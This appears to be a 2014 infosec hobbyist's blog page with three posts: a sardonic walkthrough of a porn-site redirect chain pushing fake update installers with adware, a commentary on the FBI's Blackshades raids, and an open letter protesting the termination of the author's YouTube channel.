Pages

Thursday 19 June 2014

Let Me Update That For You


Let Me Update That For You

This all starts of where a lot of suspicous activity is held, within porn. I was researching some suspicous URL's via URLquery when I came across a link with the patterns /sTDS/go.php?sid=IDNUMBER

This traffic distribution system was very easy to get to grips with, and had a fair amount of sites being redirected, most sites were porn, which led to downloading something.
In this particular site we can see that there is a call for this strange URL circled. This is where we begin our journey in updating our systems due to the friendly reminders from our good ol' porn sites.
First we go to an image, which I can only think of as being a tracker of some sort, most likely for statistics. The most interesting part of this page is the top.location.href, from the URL it seems like we will be downloading something fairly soon.
Oh good. Seems like our browser software is out of date? :(( Thanks MR dodgy site for telling me to update my systems, looks like I was close to infection! An alert too, which makes this all the more legitimate for me to take action to this.

I will point out I had closed a window which was just basically hovering over this, same idea. Plz download my exe noaw. Everything on this page will most likely redirect you to there exe setup.exe.

It's okay, they last checked at 19/6/2014, they know what they're doing!

I didn't know I was getting a premium installer! 
The main attraction, AppUpdater, common PUP. I will decline, thanks.
 After installing the wonderful software they have been paid to show, you have these wonderful instructions from them. Giving you a step by step on what to do after the installation. Thank god for that, I didn't exactly know how to start search for a program. What also got me here was there wonderful use of doubleclick.net advertising, which is owned by Google.

10/10 PUP.


Tuesday 20 May 2014

FBI Raids On Blackshades - All Bang Bang No Kiss Kiss

Most people won't like this article, mostly due to me having a little dig at the FBI. This isn't because I have some personal vendetta against them, it's mostly due to me witnessing the events that have happened in the past week, and disliking them. Most of the community has taken the news quite well, as the media doesn't point out, Blackshades was one of them products beginners used when getting into infecting users. The prime target for this product was a young teenager looking to become a big hacker. You are correct in saying it was used to hack into Miss Teen USA, which later led to the user holding her ransom because he had captured nudes. One of the big points in this story was that he was a Californian computer science school student. A relatively young adult who is fairly inexperienced in what he did, he tried to get her to contact him via the popular service Skype.

Whatever you say about Blackshades it, to me, was an attractive product to skids. Easy to use, enough function for the common user, and not too expensive for their mums to pay with their PayPal. And before you say, yes, I did cover two Blackshades products on my channel, I did not infect anyone with it, and was used to educate people on the products, as it was never "labelled" illegal then.  It had a large following of users on the ever popular "hacking" forum hackforums (wink wink). It seemed like the right thing to do, in which I could drive more views to my channel, and do not regret my choice, because it did.

When a few members on HackForums reported back that they had been raided, there was a lot of panic. A lot of members started to get worried, and started to ask a lot of questions. You could see by the posts that were made, how young the users were and how scared they were. I'm not trying to reach out to Blackshades purchasers one bit, I'm trying to shed new light into what seems like FBI's idea of a successful day. Excuse me, but even if, to me, you're over inflated facts about Blackshades are true, I feel like you're missing on a important opportunity. The product was marketed in a forum notoriously filled with kids just starting out, instead of scaring the shit out of kids because of their stupid mistakes, I thought you would be able to somehow convert their interest on the white side of things, make Cyber Security actually interesting for the younger generation. And when I say this, I'm not having a go at current course content, or educators currently within the system helping students learn. I'm talking about making it an attractive career opportunity, for various forum users around the world.

What Blackshades did for young users is create knowledge of how basic Remote Administration Tools are used, the FBI and services alike could of utilised this opportunity to find a talent pool. Only a few months back I remember stories stating a shortage in Cyber Security professionals, why not train young kids who are interested in this sort of thing? I'm not saying any of these forum users are angels, no one is, but the money used in this operation could of been used to contact and train these individuals to give them motivation into moving to the other side of computer security.





Friday 16 May 2014

YouTube Terminates InfoSec YouTuber "LinkCabin" - My Open Letter To YouTube

I feel like strikes that were made on my account were inappropriate and false. I have had a YouTube channel for over 2 years and had no problems with my content. All of the content flagged was content over a year old. I was not told at any point what the offense was on my video simply that I had broken "Community Guidelines".

Now I know you must follow a guideline for the site, but all of the rules I read on the community guidelines were not broken, I'm not trying to "lawyer" my wait out. I have had no explanation whatsoever what I've done wrong with my content.

  • Appropriate steps were made to keeps peoples privacy
  • None of the content was copyrighted, all content was my video and audio
  • All 3 strikes were given in the space of 3 days
I know you guys don't have a lot of time, but it would be great to understand why. All my videos are related to cyber security and is a major asset to various people across the internet. Since the termination I have received a lot of messages asking whats happened to my YouTube channel.
I have been responsible with my brand and have abided to many of the rules that YouTube has in place, I'm unsure if this is someone being malicious by mass flagging my videos or whether this was completely intentional on your part.
My network saw no problem with my videos and has tried to be in contact with you about why you have decided to take action.
I would like to resolve this matter, as I put a lot of research and hard work int every single video I had for 2 years in which people were starting to see. Please don't pass this aside simply because this is long, it shows that I am passionate about my channel and what I do. I do not wish to loose it.

YouTube channel: linkcabin
Strike Videos:
"How To Use Havij 1.1.5 - Introduction to the tool (Part 1)" (http://youtu.be/5f_gSMSg5Do)
"Free Web Skype Resolver | Fast | Online | HD 720" (http://youtu.be/XBGaXGPKPmk)
"Unblock the PirateBay forever! - 90MB - thepiratebay.se" (http://youtu.be/QjRQzTHDkKg)